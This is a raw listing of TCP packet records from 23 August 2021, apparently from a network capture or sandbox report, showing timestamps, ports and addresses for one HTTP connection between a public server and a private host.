Aug 23, 2021 02:08:39.522054911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522084951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522104979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522110939 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522139072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522166014 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522166014 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522192955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522209883 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522221088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522247076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522279024 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522279978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522313118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522330046 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522340059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522367001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522392988 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522413969 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522423983 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522440910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522444963 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522468090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522495031 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522496939 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522526026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522552013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522558928 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522582054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522608995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522608995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522641897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522651911 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522672892 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522699118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522725105 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522727013 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522752047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522778034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522787094 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522806883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522830009 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522835016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522869110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522876978 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522898912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522924900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522952080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.522953033 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.522979021 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523004055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523005009 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523032904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523060083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523066044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523092985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523138046 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523171902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523211956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523232937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523245096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523260117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523272038 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523288012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523317099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523339033 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523344040 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523371935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523385048 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523399115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523425102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523437023 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523458958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523489952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523511887 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523533106 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523569107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523591042 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523605108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523639917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523663044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523674965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523710012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523720026 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523755074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523793936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523807049 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523830891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523865938 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523871899 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523902893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523936987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.523947001 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.523973942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524012089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524013996 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524056911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524096012 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524118900 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524132013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524168968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524194956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524208069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524243116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524251938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524277925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524316072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524328947 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524360895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524399996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524401903 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524435043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524471045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524497986 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524507999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524542093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524564028 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524575949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524610043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524620056 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524652958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524692059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524694920 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524725914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524761915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524774075 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524797916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524832010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524846077 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524868011 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524903059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524912119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524945974 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.524983883 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.524986029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525021076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525057077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525072098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525094032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525127888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525130987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525162935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525197983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525217056 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525240898 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525279045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525295019 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525316000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525352001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525368929 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525398016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525433064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525454998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525470018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525505066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525515079 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525540113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525574923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525599003 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525609016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525652885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525674105 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525691986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525727034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525738955 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525763988 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525799036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525808096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525832891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525868893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525873899 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525903940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525948048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.525959015 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.525988102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.526036978 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.557522058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557554007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557576895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557600021 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557622910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557647943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557672977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557693958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557715893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557738066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557760000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.557914972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558008909 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558043957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558068037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558090925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558114052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558136940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558160067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558182955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558207035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558233976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558257103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558279991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558303118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558326006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558347940 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558371067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558393002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558419943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558442116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558464050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558485985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558510065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558531046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558553934 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558577061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558600903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558625937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558650970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558674097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558696032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558718920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558741093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558763027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558789968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558814049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558835030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558859110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558881044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558902979 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558924913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558948040 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558973074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.558995962 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559017897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559041023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559063911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559086084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559109926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559149027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559173107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559195042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559216976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559240103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559263945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559286118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559314966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559340000 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559364080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559390068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559412956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559437037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559459925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559483051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559509039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559535980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559557915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559581995 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559604883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559627056 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559649944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559672117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559696913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559721947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559746027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559768915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559791088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559813023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559837103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559859991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559865952 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559881926 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559885025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559885025 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559889078 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559891939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559894085 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559896946 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559900045 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559910059 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559910059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559912920 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559916019 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559919119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559921980 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559923887 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559926987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559930086 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559932947 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559932947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559936047 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559938908 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559942007 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559945107 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559947014 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559950113 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559956074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559959888 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559963942 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559967041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559969902 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559973001 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559976101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559979916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.559979916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559986115 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559988022 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559990883 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559993982 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559997082 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.559999943 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560002089 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560002089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560004950 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560008049 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560009956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560013056 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560017109 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560019970 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560023069 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560025930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560050011 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560075998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560098886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560110092 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560121059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560143948 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560157061 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560165882 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560178041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560219049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560245037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560250044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560266972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.560290098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.560291052 CEST	80	49735	193.142.59.123	192.168.2.3
